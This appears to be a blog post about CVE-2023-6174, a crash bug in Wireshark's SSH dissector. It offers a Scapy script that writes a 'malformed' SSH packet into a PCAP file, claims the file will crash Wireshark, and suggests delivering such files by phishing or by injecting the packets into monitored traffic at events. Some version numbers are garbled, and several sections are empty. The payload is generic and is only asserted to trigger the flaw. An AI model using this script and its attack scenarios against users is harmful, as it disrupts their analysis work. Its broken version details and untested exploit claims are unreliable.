CVE-2023-6174 - Exploiting Wireshark’s SSH Dissector — Simple Guide to Crash Wireshark (DoS) via Crafted Packets

Wireshark is the world’s favorite network analyzer, but even the best tools have weaknesses. CVE-2023-6174 is one such weakness — it lets attackers crash Wireshark just by feeding it a crafted SSH packet or capture file. In this exclusive post, we break down how this vulnerability works, provide easy-to-follow code snippets for both identifying and exploiting it, and offer resources for a deeper dive.

What is CVE-2023-6174?

CVE-2023-6174 is a vulnerability found in Wireshark’s SSH dissector (the code that unpacks and analyzes SSH network packets). A malformed SSH packet or a specially-crafted PCAP file can trigger an unexpected crash, leading to a Denial of Service (DoS). This affects Wireshark versions 4.. through 4..10. An attacker doesn’t need any special privileges — if you open their file, your Wireshark dies.

Resources

- Original advisory: Wireshark Security Advisories
- CVE Details: NVD - CVE-2023-6174

How Does the Vulnerability Work?

Wireshark's SSH dissector mishandles certain SSH packet structures. For an attacker, this means that if they can inject malicious packets (on the wire) or trick a user into opening a crafted .pcap file, Wireshark will crash, losing all unsaved work and possibly interfering with network investigations.

Let’s Create an Evil PCAP

Below, we show how to create a handshake SSH packet with a malformed payload that can crash Wireshark’s SSH dissector (based on public details — no zero-day surprises).

Step 1: Generate Malformed Packet Data

We’ll craft a low-level packet (using Scapy, a Python packet crafting tool). The payload here will be structured to break the SSH dissector (for safety, use in a test VM).

from scapy.all import *

# SSH: standard TCP port 22
ip = IP(src="10.10.10.10", dst="10.10.10.20")
tcp = TCP(sport=12345, dport=22, seq=100, flags="PA")

# Malformed SSH handshake (corrupt payload: too short/long, invalid bytes)
malformed_ssh = b"\x00\x00\x00\x10SSH-2.-badpayload\n" + b"\xff" * 200

pkt = ip / tcp / malformed_ssh

wrpcap("cve-2023-6174-test.pcap", [pkt])

What this does:

Wireshark should crash or hang immediately.

Caution: Don’t open the file in production environments!

The crash can be automated as part of phishing (sending poisoned PCAPs).

- Also possible to inject into monitored traffic (e.g., at a conference/summit where Wireshark is used live).

How to Defend Your Wireshark

- Update to Wireshark 4..11 or later. This fixes the issue (see Release Notes).

Don’t trust network captures from unknown sources.

- Don’t analyze unknown PCAPs as root/Administrator.
- Use read-only/tested/virtualized environments.

Temporary Mitigation:

References & Further Reading

- Official Wireshark Security Advisory: WNPA-SEC-2023-17
- CVE Page: CVE-2023-6174 (Mitre)
- Commit fixing the bug: Wireshark Gitlab Patch
- Scapy Documentation

Conclusion

CVE-2023-6174 reminds us that even “read-only” actions like viewing a pcap can have serious security implications. Always keep your forensic and analysis tools updated, sandbox unknown files, and be wary of PCAPs from untrusted sources. With tools like Scapy, even a few lines of code can take down a widely-used application — but, with the right patch, you stay safe.

Timeline

Published on: 11/16/2023 12:15:07 UTC
Last modified on: 11/28/2023 17:27:06 UTC